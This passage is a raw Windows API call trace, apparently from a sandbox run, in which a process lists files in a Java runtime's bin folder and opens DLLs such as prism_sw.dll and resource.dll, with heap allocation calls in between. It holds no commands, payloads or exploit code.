lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 53 [0093.648] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.649] GetFileType (hFile=0x360) returned 0x1 [0093.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.649] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.649] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.649] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.649] CloseHandle (hObject=0x360) returned 1 [0093.649] AreFileApisANSI () returned 1 [0093.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0093.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 53 [0093.650] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.650] GetFileType (hFile=0x360) returned 0x1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0093.650] CloseHandle (hObject=0x360) returned 1 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.651] AreFileApisANSI () returned 1 [0093.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0093.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll") returned 53 [0093.651] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1fe40)) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0093.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.651] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.651] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="prism_sw.dll", cAlternateFileName="")) returned 1 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0093.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.652] AreFileApisANSI () returned 1 [0093.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll", lpUsedDefaultChar=0x0) returned 52 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.652] AreFileApisANSI () returned 1 [0093.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0093.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 52 [0093.653] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.653] GetFileType (hFile=0x360) returned 0x1 [0093.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.653] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.653] CloseHandle (hObject=0x360) returned 1 [0093.653] AreFileApisANSI () returned 1 [0093.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0093.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 52 [0093.654] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.654] GetFileType (hFile=0x360) returned 0x1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0093.654] CloseHandle (hObject=0x360) returned 1 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.655] AreFileApisANSI () returned 1 [0093.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0093.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46518, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll") returned 52 [0093.655] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17e40)) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0093.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.655] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.655] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="resource.dll", cAlternateFileName="")) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0093.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.656] AreFileApisANSI () returned 1 [0093.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll", lpUsedDefaultChar=0x0) returned 52 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0093.656] RtlAllocateHeap 